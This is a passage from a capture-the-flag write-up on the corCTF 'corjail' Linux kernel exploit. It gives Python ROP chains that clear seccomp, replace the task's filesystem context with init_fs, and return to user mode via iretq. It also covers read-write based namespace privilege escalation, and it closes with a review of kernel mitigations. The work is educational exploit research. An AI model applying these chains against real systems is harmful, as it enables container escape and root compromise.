Using the <a href="https://man7.org/linux/man-pages/man1/nsenter.1.html"><code class="language-plaintext highlighter-rouge">nsenter</code></a> command, which is a <code class="language-plaintext highlighter-rouge">setns</code> wrapper, after returning to user space and executing a shell, however, will still result in a permission denied error. This is due to a code path in <code class="language-plaintext highlighter-rouge">fork</code> that sets the seccomp thread info flag for the child if the parent has a non-zero seccomp mode [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/fork.c#L1637">25</a>]. Thus, to get an unrestricted shell we can use the following ROP chain, which also zeroes the seccomp mode.</p>
<pre><code class="language-Python">rop_seccomp: List[int] = [
   bpf_get_current_task,              # rax = current
   mov_dword_ptr_rax_0_ret,           # current-&gt;thread_info-&gt;flags = 0
   pop_rdi_ret,
   0x768,                             # rdi = offsetof(struct task_struct, seccomp)
   add_rax_rdi_ret,                   # rax = &amp;current-&gt;seccomp.mode
   mov_dword_ptr_rax_0_ret,           # current-&gt;seccomp.mode = 0
]
</code></pre>
<p>Another idea would be to avoid the <code class="language-plaintext highlighter-rouge">setns</code> detour entirely by performing its essential operations in the ROP chain. Two key operations are happening when changing mount namespaces via the <code class="language-plaintext highlighter-rouge">setns</code> system call. First, <code class="language-plaintext highlighter-rouge">setns-&gt;validate_nsset-&gt;validate_ns-&gt;mntns_install</code> changes the filesystem context of the calling thread to that of the namespace it is joining [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/namespace.c#L4111">26</a>]. Later, <code class="language-plaintext highlighter-rouge">setns-&gt;commit_nsset-&gt;switch_task_namespaces</code> updates the namespace recorded in the <code class="language-plaintext highlighter-rouge">task_struct</code>. Here, the first operation is the interesting one. In a crude approximation, we can try to simulate it by replacing our task’s filesystem context with a copy of the <code class="language-plaintext highlighter-rouge">init_fs</code> used by kernel threads and system processes.</p>
<pre><code class="language-Python">rop_fs: List[int] = [
   bpf_get_current_task,              # rax = current
   pop_rdi_ret,
   0x6E0,                             # rdi = offsetof(struct task_struct, fs)
   add_rax_rdi_ret,
   push_rax_pop_rbx_ret,              # rbx = &amp;current-&gt;fs ; callee saved
   pop_rdi_ret,
   init_fs,
   copy_fs_struct,                    # rax = copy_fs_struct(&amp;init_fs)
   mov_qword_ptr_rbx_rax_pop_rbx_ret, # current-&gt;fs = copy_fs_struct(&amp;init_fs)
   -1,
]
</code></pre>
<p>While this certainly leaves our task in a weird state, it does the job without causing system instability.</p>

<p>What remains is returning to user mode. We could either resume the kernel at the call site where we hijacked the control flow or skip the remaining syscall execution and take a shortcut back to user space. The former requires us to save and restore all callee saved registers that were in use but has the advantage that the kernel code takes care of all the rest. The latter requires careful inspection of the surrounding code to ensure that all necessary resources are released by the ROP chain as well as a special plan for returning to user mode.</p>

<p>When exploiting pipe buffers for code execution, taking the shortcut variant necessitates no further adjustments, thus, that is what we will do. To understand how to leave kernel mode, it is best to start by looking into how it is entered. After switching to the kernel page tables {1} and stack {2}, the system call entry point contains some assembly macro magic to save the user mode CPU context to the bottom of the kernel stack {3} [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/entry/entry_64.S#L95">27</a>].</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SYM_CODE_START</span><span class="p">(</span><span class="n">entry_SYSCALL_64</span><span class="p">)</span>
	<span class="n">UNWIND_HINT_EMPTY</span>

	<span class="n">swapgs</span>
	<span class="cm">/* tss.sp2 is scratch space. */</span>
	<span class="n">movq</span>	<span class="o">%</span><span class="n">rsp</span><span class="p">,</span> <span class="n">PER_CPU_VAR</span><span class="p">(</span><span class="n">cpu_tss_rw</span> <span class="o">+</span> <span class="n">TSS_sp2</span><span class="p">)</span>
	<span class="n">SWITCH_TO_KERNEL_CR3</span> <span class="n">scratch_reg</span><span class="o">=%</span><span class="n">rsp</span>  <span class="c1">// {1}</span>
	<span class="n">movq</span>	<span class="n">PER_CPU_VAR</span><span class="p">(</span><span class="n">cpu_current_top_of_stack</span><span class="p">),</span> <span class="o">%</span><span class="n">rsp</span> <span class="c1">// {2}</span>

<span class="n">SYM_INNER_LABEL</span><span class="p">(</span><span class="n">entry_SYSCALL_64_safe_stack</span><span class="p">,</span> <span class="n">SYM_L_GLOBAL</span><span class="p">)</span>

	<span class="cm">/* Construct struct pt_regs on stack */</span> <span class="c1">// {3}</span>
	<span class="n">pushq</span>	<span class="err">$</span><span class="n">__USER_DS</span>				<span class="cm">/* pt_regs-&gt;ss */</span>
	<span class="n">pushq</span>	<span class="n">PER_CPU_VAR</span><span class="p">(</span><span class="n">cpu_tss_rw</span> <span class="o">+</span> <span class="n">TSS_sp2</span><span class="p">)</span>	<span class="cm">/* pt_regs-&gt;sp */</span>
	<span class="n">pushq</span>	<span class="o">%</span><span class="n">r11</span>					<span class="cm">/* pt_regs-&gt;flags */</span>
	<span class="n">pushq</span>	<span class="err">$</span><span class="n">__USER_CS</span>				<span class="cm">/* pt_regs-&gt;cs */</span>
	<span class="n">pushq</span>	<span class="o">%</span><span class="n">rcx</span>					<span class="cm">/* pt_regs-&gt;ip */</span>
<span class="n">SYM_INNER_LABEL</span><span class="p">(</span><span class="n">entry_SYSCALL_64_after_hwframe</span><span class="p">,</span> <span class="n">SYM_L_GLOBAL</span><span class="p">)</span>
	<span class="n">pushq</span>	<span class="o">%</span><span class="n">rax</span>					<span class="cm">/* pt_regs-&gt;orig_ax */</span>

	<span class="n">PUSH_AND_CLEAR_REGS</span> <span class="n">rax</span><span class="o">=</span><span class="err">$</span><span class="o">-</span><span class="n">ENOSYS</span>
</code></pre></div></div>
<p>The complementary code is found a bit further down in the same file [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/entry/entry_64.S#L571">28</a>]. It starts by restoring <em>most</em> of the user-mode registers {4}, switches to a temporary stack {5}, copies the remaining registers over to the new stack {6}, switches back to user page tables {7}, and finally returns to user mode {8}.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="n">POP_REGS</span> <span class="n">pop_rdi</span><span class="o">=</span><span class="mi">0</span> <span class="c1">// {4}</span>

	<span class="cm">/*
	 * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
	 * Save old stack pointer and switch to trampoline stack.
	 */</span>
	<span class="n">movq</span>	<span class="o">%</span><span class="n">rsp</span><span class="p">,</span> <span class="o">%</span><span class="n">rdi</span> <span class="c1">// {7}</span>
	<span class="n">movq</span>	<span class="n">PER_CPU_VAR</span><span class="p">(</span><span class="n">cpu_tss_rw</span> <span class="o">+</span> <span class="n">TSS_sp0</span><span class="p">),</span> <span class="o">%</span><span class="n">rsp</span> <span class="c1">// {5}</span>
	<span class="n">UNWIND_HINT_EMPTY</span>

	<span class="cm">/* Copy the IRET frame to the trampoline stack. */</span> <span class="c1">// {6}</span>
	<span class="n">pushq</span>	<span class="mi">6</span><span class="o">*</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>	<span class="cm">/* SS */</span>
	<span class="n">pushq</span>	<span class="mi">5</span><span class="o">*</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>	<span class="cm">/* RSP */</span>
	<span class="n">pushq</span>	<span class="mi">4</span><span class="o">*</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>	<span class="cm">/* EFLAGS */</span>
	<span class="n">pushq</span>	<span class="mi">3</span><span class="o">*</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>	<span class="cm">/* CS */</span>
	<span class="n">pushq</span>	<span class="mi">2</span><span class="o">*</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>	<span class="cm">/* RIP */</span>

	<span class="cm">/* Push user RDI on the trampoline stack. */</span>
	<span class="n">pushq</span>	<span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>

	<span class="cm">/*
	 * We are on the trampoline stack. All regs except RDI are live.
	 * We can do future final exit work right here.
	 */</span>
	<span class="n">STACKLEAK_ERASE_NOCLOBBER</span>

	<span class="n">SWITCH_TO_USER_CR3_STACK</span> <span class="n">scratch_reg</span><span class="o">=%</span><span class="n">rdi</span> <span class="c1">// {7}</span>

	<span class="cm">/* Restore RDI. */</span>
	<span class="n">popq</span>	<span class="o">%</span><span class="n">rdi</span>
	<span class="n">SWAPGS</span>
	<span class="n">INTERRUPT_RETURN</span> <span class="c1">// {8}</span>
</code></pre></div></div>
<p>What this teaches us, is that the kernel’s interrupt return routine wants to be executed with a particular stack layout, which consists of register values saved on syscall entry. Then, setting the CPU to user mode happens by executing an <a href="https://www.felixcloutier.com/x86/iret:iretd:iretq"><code class="language-plaintext highlighter-rouge">iretq</code></a> instruction, which is a complex instruction that, among other things, sets multiple registers from values stored on the stack. Luckily, the expected layout is described in a helpful comment {6}. Thus, by appending the following tail to our ROP chain, which transfers control directly to the stack switch {7} as we are not interested in restoring any general-purpose registers, we can return to a chosen user mode address.</p>
<pre><code class="language-Python">regs: gdb.Value = current_pt_regs()
rop_iret: List[int] = [
   swapgs_restore_regs_and_return_to_usermode + 22,
   int(regs["di"]), # rdi, was set to `flags` by user
   -1,             # rax, junk
   int(regs["si"]), # rip, was set to `&amp;return_to_here` by user
   int(regs["cs"]),
   int(regs["flags"]),
   int(regs["sp"]),
   int(regs["ss"]),
]
</code></pre>
<p>Here, the gdb script is using the kernel-saved register values for convenience, however, the final exploit can simply read them with the appropriate CPU instructions when building the ROP chain [<a href="https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rop.c#L112">29</a>]. With all general-purpose registers being clobbered by the irregular syscall return and the new stack being empty, the user mode function we return to should not expect any arguments and never return itself.</p>

<p>To debug the ROP-based privilege escalations, we can combine the different pieces to the full chain and then run the user mode helper with the <code class="language-plaintext highlighter-rouge">-r</code> flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ test_privesc -r -- bash
</code></pre></div></div>

<h3 id="read-write">Read-Write</h3>
<p>A common data-only privilege escalation technique is to overwrite the <code class="language-plaintext highlighter-rouge">MODPROBE_PATH</code> variable. It holds the filesystem path of a program that the kernel will execute via <code class="language-plaintext highlighter-rouge">search_binary_handler-&gt;__request_module-&gt;call_modprobe</code> whenever it cannot find a handler to launch an executable file supplied to the <code class="language-plaintext highlighter-rouge">execve</code> syscall, i.e., it starts with an unknown magic [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/kmod.c#L93">30</a>]. The program will be executed in the root namespaces as the root user. When using this technique for container escapes, we overwrite the variable with the path to a program or script we control. Note, however, that we need a path that is valid in the <em>root</em> mount namespace. Such a path can, for example, be constructed from the first entry of <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/mounts</code>.</p>

<p>However, the challenge is using the <code class="language-plaintext highlighter-rouge">CONFIG_STATIC_USERMODEHELPER</code> that forces all invocations of user mode programs through a fixed path [<a href="https://www.kernelconfig.io/config_static_usermodehelper?arch=x86&amp;kernelversion=6.3.12">31</a>]. Thus, using the above technique would require writing to kernel read-only mappings, which we cannot do with our pipe-based read-write primitive as the kernel rodata and text segment are also marked read-only in the direct map. Thus, we can either upgrade to a page table-based read-write primitive or look for another way.</p>

<p>Being uncreative and lazy, I simply opted for replicating the ROP privilege escalations with the read-write primitive. Being even more lazy, I did not even bother searching for the namespace’s pid 1, but rather overwrote the mount namespace of the current task, and then used <code class="language-plaintext highlighter-rouge">setns</code> on <code class="language-plaintext highlighter-rouge">/proc/self/ns/mnt</code>. Imitating the other ROP-based privilege escalation can be done by simply setting <code class="language-plaintext highlighter-rouge">current-&gt;fs-&gt;{root,pwd}</code> to those of the <code class="language-plaintext highlighter-rouge">init_fs</code>, which is morally equivalent to the copy operation. The gdb script and user mode helper can be used for debugging the former</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ test_privesc -n -u -c -s -- bash
</code></pre></div></div>
<p>and the latter.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ test_privesc -c -m -- bash
</code></pre></div></div>

<h3 id="final-exploit">Final Exploit</h3>
<p>Integrating the Python prototypes into the final exploit is straightforward. In the last post, we already created abstractions that allow for convenient reading and writing of kernel memory. With those the corresponding privilege escalations are easy to implement. See the <a href="https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rw_pipe_and_tty.c"><code class="language-plaintext highlighter-rouge">rw_pipe_and_tty</code> module</a> of the exploit library for details. Furthermore, we already set up everything for executing a ROP chain. The code that builds it can be found in the <a href="https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rop.c"><code class="language-plaintext highlighter-rouge">rop</code> module</a>.</p>

<h2 id="mitigations">Mitigations</h2>
<p>It is worrying that a single null byte written out-of-bounds is enough to allow a sandboxed process to compromise the entire system - but surely the CTF challenge was not representative of an actual Linux system, right? Mitigations are meant to reduce the exploitability of one or more bug classes, i.e., they should make it harder for an attacker to write an exploit for a particular bug of that class. Most of the mitigations available in the x64 mainline kernel were in fact active on the challenge system. We can use the <code class="language-plaintext highlighter-rouge">kconfig-hardened-check</code> tool to check if any crucial mitigations are missing and compare it to the vanilla Arch Linux kernel as well as its hardened version [<a href="https://github.com/a13xp0p0v/kconfig-hardened-check">32</a>].</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ kconfig-hardened-check -c /usr/src/linux/.config | tail -n 1
[+] Config check is finished: 'OK' - 91 / 'FAIL' - 92
$ kconfig-hardened-check -c /usr/src/linux-hardened/.config | tail -n 1
[+] Config check is finished: 'OK' - 124 / 'FAIL' - 59
$ kconfig-hardened-check -c kernel_root/linux-5.10.127_x86_64_corjail/.config | tail -n 1
[+] Config check is finished: 'OK' - 106 / 'FAIL' - 77
</code></pre></div></div>
<p>It will be instructive to look back at the exploit and record which mitigations we bypassed, and how we did that. We will not cover all mitigations, see the Linux Kernel Defense Map to get an idea of further mitigations [<a href="https://github.com/a13xp0p0v/linux-kernel-defence-map">33</a>]. Furthermore, we will discuss some mitigations that have been implemented elsewhere and would have prevented our exploit in its current form.</p>

<p>The exploit primitive was a linear heap overflow. Slab freelist randomization is meant to mitigate against such bugs [<a href="https://mxatone.medium.com/randomizing-the-linux-kernel-heap-freelists-b899bb99c767">34</a>]. It added some inevitable non-determinism to our exploit, limiting its theoretical success rate to about 95.2%. We were able to get close to this theoretical maximum by combining common exploit stabilization techniques like defragmentation, heap grooming, cpu pinning, and multi-process heap sprays to reliably create the desired heap state [<a href="https://www.usenix.org/conference/usenixsecurity22/presentation/zeng">35</a>].</p>

<p>It is worth mentioning, however, that there are other mitigations that would have stopped us dead in our tracks at this point.</p>

<p>One category can be summarized as cache isolation based mitigations. The general idea is to reduce the set of victim objects by splitting allocations across more caches. For example, recall that the cache serving a kmalloc call was selected based on the allocation size and flags, where the latter were used to choose one of four different caches (“normal”, “dma”, “reclaimable”, “cgroup”). Starting with Linux 6.6, an additional dimension was added to the cache matrix. For “normal” allocations, the address of the kmalloc call site will be combined with a per-boot random token, and the hash of this will be used to select one of N equivalent caches to serve the allocation [<a href="https://lwn.net/Articles/938637/">36</a>]. This would introduce an unacceptable factor of 1/N to the exploit success rate since we need filter and poll list allocations to land in the same cache. Furthermore, it makes heap state manipulations harder, as we do not know if two kmalloc calls will manipulate the same cache. Potentially, one could try to leak this bit of information through correlating allocation timings similar to previous work [<a href="https://www.usenix.org/conference/usenixsecurity23/presentation/lee-yoochan">37</a>]. The overflow could still work reliably as a cross-cache overflow, where we would try to spray slabs full of poll lists in the hope that they end up next to a slab ending in a filter. Similarly, grsecurity’s AUTOSLAB, among other things, implements cache isolation of all allocation sites [<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">38</a>] and Google’s custom hardening patches (used to) isolate elastic objects in a separate cache [<a href="https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README">39</a>].</p>

<p>Another category of overflow mitigations is memory tagging based [<a href="https://googleprojectzero.blogspot.com/2023/08/summary-mte-as-implemented.html">40</a>]. For example, the ARM implementation of the Kernel Address Sanitizer (KASAN) supports a hardware-assisted mode that is meant to be used as a mitigation against heap overflow, UAF, and double-free bugs in production [<a href="https://www.youtube.com/watch?v=UwMt0e_dC_Q">41</a>].</p>

<p>Next, we performed an arbitrary free through a partial pointer overwrite. Obviously, memory tagging could be used as a probabilistic mitigation here as well, since the tag of the pointer that is freed will probably not match the tag of memory it points to. Software mitigations exist as well. For example, grsecurity kernels add random padding to the beginning of each new slab [<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">38</a>]. This might lead to a misaligned free, causing further degradation of exploit reliably as we can no longer be sure that pointed to QWORD is zero.</p>

<p>Use-after-free scenarios are a strong exploit primitive, and thus it is unsurprising that many mitigations try to make them less exploitable. Again, memory tagging based mitigations are an obvious option to detect such situations. One might think that cache isolation based mitigations might be effective here as they cut down the set of objects available for creating type confusions. However, they are easily bypassed by handing the page with the vulnerable object back to the Page Allocator. Grsecurity’s random slab padding might help in the sense that objects cannot be deterministically overlapped because the new slab might have another padding. However, when reclaiming with objects like user page tables, or other types of arrays, the mitigation becomes much less useful. Personally, I think Google’s Jann Horn is currently working on upstreaming a more promising mitigation. It deterministically mitigates against reclaiming via slab page reuse by making it impossible to reuse virtual memory that was once assigned to a cache for anything but slabs of that cache [<a href="https://github.com/thejh/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e">42</a>]. In particular, he moves slab allocations to their own virtual memory region, where he can implement strict cache memory isolation without causing unacceptable overhead by deallocating the underlying physical memory, something that is not possible in the direct map. It is needless to say that randomized cache isolation in combination with strict reuse prevention would have killed the whole UAF part of our exploit.</p>

<p>Moving on to the control flow hijacking part, we enter the world of forward-edge control flow integrity (CFI) enforcement. With any common form of CFI, the code path that we used to gain code execution would have roughly looked like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">pipe_buf_release</span><span class="p">(</span><span class="k">struct</span> <span class="n">pipe_inode_info</span> <span class="o">*</span><span class="n">pipe</span><span class="p">,</span>
                                   <span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="o">*</span><span class="n">buf</span><span class="p">)</span>
<span class="p">{</span>
   <span class="k">const</span> <span class="k">struct</span> <span class="n">pipe_buf_operations</span> <span class="o">*</span><span class="n">ops</span> <span class="o">=</span> <span class="n">buf</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">;</span>
   <span class="n">buf</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

   <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">release</span><span class="p">)(</span><span class="k">struct</span> <span class="n">pipe_inode_info</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="o">*</span><span class="p">)</span> <span class="o">=</span> <span class="n">ops</span><span class="o">-&gt;</span><span class="n">release</span><span class="p">;</span>
   <span class="k">if</span> <span class="p">(</span><span class="n">is_valid_indirect_call_target</span><span class="p">(</span><span class="n">release</span><span class="p">))</span>
       <span class="n">release</span><span class="p">(</span><span class="n">pipe</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
   <span class="k">else</span>
       <span class="n">panic</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The details of what <code class="language-plaintext highlighter-rouge">is_valid_indirect_call_target</code> does, vary depending on the concrete CFI implementation and may be pure software constructs or assisted by hardware features. For example, Windows is using compiler instrumentation [<a href="https://en.wikipedia.org/wiki/Control-flow_integrity#Microsoft_Control_Flow_Guard">43</a>] while iOS is using pointer authentication [<a href="https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html">44</a>]. While those mitigations are regularly bypassed by exploits on these platforms, they do raise the bar for getting initial code execution and would have required us to put in an additional effort [<a href="https://bazad.github.io/presentations/BlackHat-USA-2020-iOS_Kernel_PAC_One_Year_Later.pdf">45</a>].</p>

<p>Continuing with our ROP chain, we profited from the absence of back-edge CFI in the challenge kernel. While hardware shadow stacks might soon mitigate against ROP exploits in user space on x64 [<a href="https://lwn.net/Articles/926649/">46</a>] and arm64 [<a href="https://lwn.net/Articles/940403/">47</a>], activation of this feature in kernel mode is not anywhere in sight. On other platforms, return address signing would have prohibited our ROP chain from running without first finding a way to sign it [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/arm64/Kconfig#L1510">48</a>].</p>

<p>Another thing that might have caught our ROP exploit could have been some form of runtime security checking. For example, the Linux Kernel Runtime Guard (LKRG) project has an exploit detection (ED) module that includes checks looking for an illicit modification to a task’s credentials [<a href="https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1215">49</a>], namespaces [<a href="https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1363">50</a>], or seccomp status [<a href="https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1382">51</a>]. If its hooks manage to catch a task in the middle of a ROP chain, the ED module will also detect that the stack pointer is not within a sane region [<a href="https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1326">52</a>] and kill the offending task. While it is certainly possible to bypass [<a href="https://a13xp0p0v.github.io/2021/08/25/lkrg-bypass.html">53</a>] [<a href="https://github.com/milabs/lkrg-bypass">54</a>], it would have caught our exploit in its current form. In general, I think it is valuable against off-the-shelf exploits not targeted towards a specific user’s environment.</p>

<p>Of course, the reason we had to resort to ROP in the first place was to bypass Data Execution Prevention (DEP) and Supervisor Mode Execution Prevention (SMEP), which prevented us from using shellcode or jumping into user space code, respectively. By placing the ROP chain in kernel memory, we also bypassed Supervisor Mode Access Prevention (SMAP), which prevented us from placing the ROP chain in user space memory.</p>

<p>Other operating systems also have mitigations targeted towards kernel read-write primitives. For example, Apple’s ARM processor has a proprietary hardware feature that enables creating a security boundary within the kernel that makes page tables read-only for most kernel code [<a href="https://blog.siguza.net/APRR/">55</a>]. Furthermore, iOS is also using PAC to protect the integrity of some data structures, e.g., the tread state [<a href="https://www.google.com/url?q=https://bazad.github.io/presentations/BlackHat-USA-2020-iOS_Kernel_PAC_One_Year_Later.pdf&amp;sa=U&amp;ved=2ahUKEwiIg_GSgteAAxWzK7kGHYCgCdUQFnoECAoQAg&amp;usg=AOvVaw12Yeao3WAUNwGg03EwzZib">56</a>]. Windows, on the other hand, is using a hypervisor-based approach, e.g., to keep code integrity properties despite attackers having a kernel read-write primitive [<a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">57</a>]. Many mobile Linux environments also employ hypervisor-based integrity mechanisms, e.g., Samsung Real-time Kernel Protection is active on the vendor’s Android devices [<a href="https://www.samsungknox.com/en/blog/real-time-kernel-protection-rkp">58</a>] [<a href="https://googleprojectzero.blogspot.com/2017/02/lifting-hyper-visor-bypassing-samsungs.html">59</a>]. Efforts exist to move support to the Linux mainline [<a href="https://github.com/heki-linux">60</a>]. While some of those implementations would have caught our exploit’s modification of critical data structures like credentials, they are mostly targeted at post-exploitation and persistence.</p>

<h2 id="conclusions">Conclusions</h2>
<p>This closing look at other mitigations and platforms helps to put things in perspective. Our efforts up to this point are still child’s play and only scratch the very surface of the current kernel exploitation game, completely ignoring the in reality much more relevant field of post-exploitation.</p>

<p>However, this whole series was only ever meant to be an entry point into the field and <em>that</em> goal has certainly been reached. Furthermore, it has also made clear in which direction the further learning process should be directed, so stay tuned for season two.</p>

<h2 id="references">References</h2>

<p>[0] https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html</p>

<p>[1] https://blog.eb9f.de/2023/08/05/Linux-S1-E2.html</p>

<p>[2] https://github.com/vobst/ctf-corjail-public</p>

<p>[3] https://github.com/vobst/like-dbg-fork-public</p>

<p>[5] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/seccomp.c#L942</p>

<p>[6] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/entry/common.c#L57</p>

<p>[7] https://docs.docker.com/engine/security/seccomp/</p>

<p>[8] https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/blob/master/pwn/corjail/task/chall/seccomp.json</p>

<p>[9] https://security.googleblog.com/2023/06/learnings-from-kctf-vrps-42-linux.html</p>

<p>[10] https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html</p>

<p>[11] https://www.willsroot.io/2022/01/cve-2022-0185.html</p>

<p>[12] https://syst3mfailure.io/wall-of-perdition/</p>

<p>[13] https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html</p>

<p>[14] https://lwn.net/Articles/531114/</p>

<p>[15] https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html</p>

<p>[16] https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation</p>

<p>[17] https://docs.docker.com/engine/security/userns-remap/</p>

<p>[18] https://docs.docker.com/engine/security/apparmor/</p>

<p>[19] https://github.com/moby/moby/blob/master/profiles/apparmor/template.go</p>

<p>[20] https://starlabs.sg/blog/2023/07-a-new-method-for-container-escape-using-file-based-dirtycred/</p>

<p>[21] https://www.offensivecon.org/speakers/2023/alex-plaskett-and-cedric-halbronn.html</p>

<p>[22] https://github.com/vobst/ctf-corjail-public/blob/master/test_privesc.c</p>

<p>[23] https://github.com/vobst/like-dbg-fork-public/blob/master/io/scripts/gdb_script_test_privesc.py</p>

<p>[24] https://www.offensivecon.org/speakers/2020/alexander-popov.html</p>

<p>[25] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/fork.c#L1637</p>

<p>[26] https://elixir.bootlin.com/linux/v5.10.127/source/fs/namespace.c#L4111</p>

<p>[27] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/entry/entry_64.S#L95</p>

<p>[28] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/entry/entry_64.S#L571</p>

<p>[29] https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rop.c#L112</p>

<p>[30] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/kmod.c#L93</p>

<p>[31] https://www.kernelconfig.io/config_static_usermodehelper?arch=x86&amp;kernelversion=6.3.12</p>

<p>[32] https://github.com/a13xp0p0v/kconfig-hardened-check</p>

<p>[33] https://github.com/a13xp0p0v/linux-kernel-defence-map</p>

<p>[34] https://mxatone.medium.com/randomizing-the-linux-kernel-heap-freelists-b899bb99c767</p>

<p>[35] https://www.usenix.org/conference/usenixsecurity22/presentation/zeng</p>

<p>[36] https://lwn.net/Articles/938637/</p>

<p>[37] https://www.usenix.org/conference/usenixsecurity23/presentation/lee-yoochan</p>

<p>[38] https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game</p>

<p>[39] https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README</p>

<p>[40] https://googleprojectzero.blogspot.com/2023/08/summary-mte-as-implemented.html</p>

<p>[41] https://www.youtube.com/watch?v=UwMt0e_dC_Q</p>

<p>[42] https://github.com/thejh/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e</p>

<p>[43] https://en.wikipedia.org/wiki/Control-flow_integrity#Microsoft_Control_Flow_Guard</p>

<p>[44] https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html</p>

<p>[45] https://bazad.github.io/presentations/BlackHat-USA-2020-iOS_Kernel_PAC_One_Year_Later.pdf</p>

<p>[46] https://lwn.net/Articles/926649/</p>

<p>[47] https://lwn.net/Articles/940403/</p>

<p>[48] https://elixir.bootlin.com/linux/v5.10.127/source/arch/arm64/Kconfig#L1510</p>

<p>[49] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1215</p>

<p>[50] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1363</p>

<p>[51] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1382</p>

<p>[52] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1326</p>

<p>[53] https://a13xp0p0v.github.io/2021/08/25/lkrg-bypass.html</p>

<p>[54] https://github.com/milabs/lkrg-bypass</p>

<p>[55] https://blog.siguza.net/APRR/</p>

<p>[56] https://www.google.com/url?q=https://bazad.github.io/presentations/BlackHat-USA-2020-iOS_Kernel_PAC_One_Year_Later.pdf&amp;sa=U&amp;ved=2ahUKEwiIg_GSgteAAxWzK7kGHYCgCdUQFnoECAoQAg&amp;usg=AOvVaw12Yeao3WAUNwGg03EwzZib</p>

<p>[57] https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs</p>

<p>[58] https://www.samsungknox.com/en/blog/real-time-kernel-protection-rkp</p>

<p>[59] https://googleprojectzero.blogspot.com/2017/02/lifting-hyper-visor-bypassing-samsungs.html</p>

